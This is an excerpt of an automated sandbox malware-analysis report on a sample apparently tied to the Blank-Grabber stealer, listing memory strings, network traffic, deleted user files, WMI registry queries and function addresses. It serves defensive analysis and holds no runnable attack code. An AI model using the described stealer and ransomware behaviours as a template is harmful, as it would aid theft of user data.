              Source: powershell.exe, 00000007.00000002.2222117000.000001B991E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03CCF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03C986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03C986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404350121.000001F12BD40000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AD71000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2045682909.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2039094220.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2034507305.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2039896185.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399381962.000001F12AC00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048564293.000001F12AD6C000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8CCC000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B4D8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B36D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2125868086.000001F12B4D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2112269853.000001F12B31C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2111259470.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2093044186.000001F12B23C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2401507128.000001F12B317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/p
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2112269853.000001F12B31C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B4D8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B36D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2125868086.000001F12B4D8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C458000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2112269853.000001F12B31C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2111259470.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2093044186.000001F12B23C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2145115778.000001F12B37E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2068920693.000001F12B37F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085069961.000001F12B37F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B37E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2085069961.000001F12B37F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B37E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2407250158.00007FF8A87B4000.00000004.00000001.01000000.0000000F.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.drString found in binary or memory: https://www.openssl.org/H
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8D69000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\BJZFPPWAPT.docxJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\BJZFPPWAPT.docxJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\NVWZAPQSQL.xlsxJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\BJZFPPWAPT.pngJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\NWCXBPIUYI.mp3Jump to behavior
              Source: cmd.exeProcess created: 53

              System Summary

              barindex
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,70_2_00007FF6AA1A3A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,70_2_00007FF6AA1CB57C
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA510000_2_00007FF78DA51000
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA769D40_2_00007FF78DA769D4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA58BD00_2_00007FF78DA58BD0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA69F100_2_00007FF78DA69F10
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA75EEC0_2_00007FF78DA75EEC
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA61DC40_2_00007FF78DA61DC4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA65DA00_2_00007FF78DA65DA0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA636100_2_00007FF78DA63610
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA6E5E00_2_00007FF78DA6E5E0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5AD1D0_2_00007FF78DA5AD1D
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA718E40_2_00007FF78DA718E4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA598700_2_00007FF78DA59870
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA61FD00_2_00007FF78DA61FD0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA617B00_2_00007FF78DA617B0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA797980_2_00007FF78DA79798
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA688040_2_00007FF78DA68804
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA6DF600_2_00007FF78DA6DF60
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA6DACC0_2_00007FF78DA6DACC
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA621D40_2_00007FF78DA621D4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA619B40_2_00007FF78DA619B4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA63A140_2_00007FF78DA63A14
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA681540_2_00007FF78DA68154
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA709380_2_00007FF78DA70938
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA7411C0_2_00007FF78DA7411C
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5A4E40_2_00007FF78DA5A4E4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA764880_2_00007FF78DA76488
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA709380_2_00007FF78DA70938
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA62C800_2_00007FF78DA62C80
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA73C800_2_00007FF78DA73C80
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA75C700_2_00007FF78DA75C70
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA61BC00_2_00007FF78DA61BC0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5A34B0_2_00007FF78DA5A34B
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA510002_2_00007FF78DA51000
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA769D42_2_00007FF78DA769D4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA69F102_2_00007FF78DA69F10
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA75EEC2_2_00007FF78DA75EEC
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A885EEC02_2_00007FF8A885EEC0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A88579D02_2_00007FF8A88579D0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87FFAB02_2_00007FF8A87FFAB0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87F7E902_2_00007FF8A87F7E90
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A88569C02_2_00007FF8A88569C0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A884EAA02_2_00007FF8A884EAA0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A888AA302_2_00007FF8A888AA30
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A8864A402_2_00007FF8A8864A40
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87F4B202_2_00007FF8A87F4B20
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A880ACF02_2_00007FF8A880ACF0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87FAC002_2_00007FF8A87FAC00
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A8806C402_2_00007FF8A8806C40
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92EB3602_2_00007FF8A92EB360
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E15372_2_00007FF8A92E1537
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A9340B302_2_00007FF8A9340B30
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E6BA02_2_00007FF8A92E6BA0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E168B2_2_00007FF8A92E168B
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E15B42_2_00007FF8A92E15B4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E1BE02_2_00007FF8A92E1BE0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E20B32_2_00007FF8A92E20B3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8475F1DCA7_2_00007FF8475F1DCA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8476C30277_2_00007FF8476C3027
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FF8475D205D42_2_00007FF8475D205D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FF8475D3EC542_2_00007FF8475D3EC5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FF8475D3EB542_2_00007FF8475D3EB5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FF8476A17D942_2_00007FF8476A17D9
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18ABA070_2_00007FF6AA18ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA190A2C70_2_00007FF6AA190A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B7B2470_2_00007FF6AA1B7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AAE1070_2_00007FF6AA1AAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1954C070_2_00007FF6AA1954C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19118070_2_00007FF6AA191180
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1882F070_2_00007FF6AA1882F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18188470_2_00007FF6AA181884
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18B54070_2_00007FF6AA18B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C4B3870_2_00007FF6AA1C4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D9B9870_2_00007FF6AA1D9B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA198C3070_2_00007FF6AA198C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C5C8C70_2_00007FF6AA1C5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B0D2070_2_00007FF6AA1B0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18DD0470_2_00007FF6AA18DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D6D0C70_2_00007FF6AA1D6D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A9D0C70_2_00007FF6AA1A9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AD97C70_2_00007FF6AA1AD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1849B870_2_00007FF6AA1849B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C69FD70_2_00007FF6AA1C69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C5A7070_2_00007FF6AA1C5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BFA6C70_2_00007FF6AA1BFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1EAAC070_2_00007FF6AA1EAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18CB1470_2_00007FF6AA18CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B5F4C70_2_00007FF6AA1B5F4C
